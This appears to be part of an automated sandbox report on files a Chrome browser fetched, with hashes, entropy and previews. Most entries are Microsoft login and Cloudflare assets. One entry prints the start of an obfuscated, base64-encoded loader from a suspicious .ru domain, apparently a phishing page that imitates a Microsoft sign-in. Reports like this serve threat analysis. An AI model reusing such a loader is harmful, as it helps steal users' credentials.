                                                                                                Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                Category:downloaded
                                                                                                Size (bytes):1435
                                                                                                Entropy (8bit):7.8613342322590265
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:downloaded
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                URL:https://mxkyzscyur8nfklyvxelqzlfebdqukcm0xreokx7wajreqwksql15.apouters.ru/eiplrjzzfrejlblaunoeneKVeqNiYCDPZXKMQJICCTDCGMWODAHEQACYBMXECL
                                                                                                Preview:1
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 28 x 71, 8-bit/color RGB, non-interlaced
                                                                                                Category:downloaded
                                                                                                Size (bytes):61
                                                                                                Entropy (8bit):4.035372245524404
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:yionv//thPlh4t/OWpsyxl/k4E08up:6v/lhPUtPH7Tp
                                                                                                MD5:C0509578D5FAD5690895E4B731B0469F
                                                                                                SHA1:8E377BD99B31D937324A635580BEFF6AAEA09D00
                                                                                                SHA-256:4FBAA1F95CCF09462C90D02557FCD7EA5A80301518F7C4981021A708D039917B
                                                                                                SHA-512:34201AED2EF8E3306F8C8C001D217FF6D8EE803047FE1A87234ACC60BB2DB55FAC04EFF630CC4E97C0A05B18E62C921FC7D651495DC3E0CB408298218D98D0CA
                                                                                                Malicious:false
                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8feca7eefaf042bb/1736344221782/yp26R9IhIYuAHho
                                                                                                Preview:.PNG........IHDR.......G......&......IDAT.....$.....IEND.B`.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                Category:dropped
                                                                                                Size (bytes):1435
                                                                                                Entropy (8bit):7.8613342322590265
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                Malicious:false
                                                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (47520)
                                                                                                Category:downloaded
                                                                                                Size (bytes):47521
                                                                                                Entropy (8bit):5.398500199255723
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                                                                                MD5:301F68F3D8317AB22D4021E266C9A853
                                                                                                SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                                                                SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                                                                SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                                                                Malicious:false
                                                                                                URL:https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.js
                                                                                                Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                Category:downloaded
                                                                                                Size (bytes):116343
                                                                                                Entropy (8bit):7.997640489040715
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                                                                MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                                                SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                                                SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                                                SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                                                                Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:HTML document, ASCII text, with very long lines (7529), with CRLF line terminators
                                                                                                Category:downloaded
                                                                                                Size (bytes):20253
                                                                                                Entropy (8bit):5.886983866662396
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:znu9T2TsnbVOSSADVZGRPP7OVXXlnu9T2TsnbVOSSADVZGRPPdlr5sslr5M:naJQRPP7AXXdaJQRPPdlr5sslr5M
                                                                                                MD5:32281BC69C114A57035F54816D693B24
                                                                                                SHA1:1BA9CA1D258657BD9A69E0552AE0A12EA75C4E29
                                                                                                SHA-256:2CB17C0D74D61AF2F1F7C8685806810E197B0CDE8428AB612BFE61D00F52AC7E
                                                                                                SHA-512:8C5AAC76714E6F92883C58B34E8204E261ECD30ED9D075A82509AC66B908D3BD94E5A15253EE0F4967A43820CA0344F0DB6B2FC21C5ECE4C97F1B45983946E0A
                                                                                                Malicious:false
                                                                                                URL:https://ppx.musicstrevbng.ru/Ax4EM/
                                                                                                Preview:<script>../* All our dreams can come true if we have the courage to pursue them. */..if(atob("aHR0cHM6Ly83US5tdXNpY3N0cmV2Ym5nLnJ1L0F4NEVNLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhl
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                                Category:dropped
                                                                                                Size (bytes):89501
                                                                                                Entropy (8bit):5.289893677458563
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                Malicious:false
                                                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                Category:dropped
                                                                                                Size (bytes):49911
                                                                                                Entropy (8bit):7.994516776763163
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                Malicious:false
                                                                                                Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                Category:downloaded
                                                                                                Size (bytes):3452
                                                                                                Entropy (8bit):5.117912766689607
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                Malicious:false
                                                                                                URL:https://login.live.com/Me.htm?v=3
                                                                                                Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):72
                                                                                                Entropy (8bit):4.241202481433726
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                Malicious:false
                                                                                                Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 49 x 24, 8-bit/color RGB, non-interlaced
                                                                                                Category:downloaded
                                                                                                Size (bytes):61
                                                                                                Entropy (8bit):4.035372245524405
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:yionv//thPl0ntlx4QlCyxl/k4E08up:6v/lhPKMQt7Tp
                                                                                                MD5:7C2F7D6C4239C102CB4FDB3CAC6F1FD7
                                                                                                SHA1:1E7ADCE6461F6DB877E6D13C08A5CEE9A6F30C69
                                                                                                SHA-256:5C34B11DE28E13E82939AB50AE098E3F6D12FAAAE316ADCE32B50EB4B1432B03
                                                                                                SHA-512:0F9A42E43B9D8EC58923C3985E03163DE9EC7E3AB4C684156809552870C78565E441A7B931870A1DF73AB54198FCFEFA15A2BC405BDA9C0C1B3D2A5E1AAA07BA
                                                                                                Malicious:false
                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8feca4d8fcf5c334/1736344096000/ynYn-Mf8eQqp7b8
                                                                                                Preview:.PNG........IHDR...1..........]......IDAT.....$.....IEND.B`.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                                                Category:downloaded
                                                                                                Size (bytes):122515
                                                                                                Entropy (8bit):7.997419459076181
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                                                MD5:AC9A6ED508328361A4C9530325A94076
                                                                                                SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                                                SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                                                SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                                                                Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                Category:downloaded
                                                                                                Size (bytes):621
                                                                                                Entropy (8bit):7.673946009263606
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                Category:downloaded
                                                                                                Size (bytes):61
                                                                                                Entropy (8bit):3.990210155325004
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                Malicious:false
                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 49 x 24, 8-bit/color RGB, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):61
                                                                                                Entropy (8bit):4.035372245524405
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:yionv//thPl0ntlx4QlCyxl/k4E08up:6v/lhPKMQt7Tp
                                                                                                MD5:7C2F7D6C4239C102CB4FDB3CAC6F1FD7
                                                                                                SHA1:1E7ADCE6461F6DB877E6D13C08A5CEE9A6F30C69
                                                                                                SHA-256:5C34B11DE28E13E82939AB50AE098E3F6D12FAAAE316ADCE32B50EB4B1432B03
                                                                                                SHA-512:0F9A42E43B9D8EC58923C3985E03163DE9EC7E3AB4C684156809552870C78565E441A7B931870A1DF73AB54198FCFEFA15A2BC405BDA9C0C1B3D2A5E1AAA07BA
                                                                                                Malicious:false
